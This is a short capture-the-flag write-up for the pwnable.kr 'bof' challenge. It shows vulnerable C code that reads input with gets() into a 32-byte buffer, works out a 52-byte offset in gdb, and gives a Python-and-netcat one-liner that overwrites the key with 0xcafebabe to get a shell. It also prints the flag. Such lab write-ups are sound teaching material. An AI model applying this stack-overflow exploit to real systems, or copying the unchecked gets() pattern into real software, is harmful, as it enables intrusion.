Toddler's Bottle - bof

1. 0xdeadbeef is sent to func as a key.

2. In func:

   1. user input a string, saved to array overflowme[32]

   2. no length check performed, means you can input a string much longer than 32bytes

   3. key = 0xcafebabe? if yes, you get the flag

Code:

void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);    // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

How to get the flag?

In order to get the flag, we must make the value of key equal to 0xcafebabe. Since there's no length check performed, we can craft a long string to make it overwrite 0xdeadbeef. The last 4bytes of the string is set to 0xcafebabe.

AAAAAAAAA........AAAAAAA....0xcafebabe

So how long should the string be?

First download the bof file from http://pwnable.kr/bin/bof. Open the file with gdb ./bof

1. Set breakpoints:
2. Run with 'r', then run by step using 'ni' or 'si', untill you need to input something(I input a long string with 33 'A'):
3. Note the string is saved to ESP. Check the value of ESP. Or use telescope [linecount] (e.g. telescope 25) to display memory content. So the 33 bytes 'A' are stored from 0xbffff30c to 0xbffff32b. Note the address of 0xdeadbeef is from 0xbffff340. So, how long the string should be to overwrite 0xdeadbeef? 0xbffff340 - 0xbffff30c = 0x34 which is 52 bytes in decimal.

Solution:

root@kali:~$ (python -c "print 'A'*52+'\xbe\xba\xfe\xca'";cat - ) | nc pwnable.kr 9000
cat flag
daddy, I just pwned a buFFer :)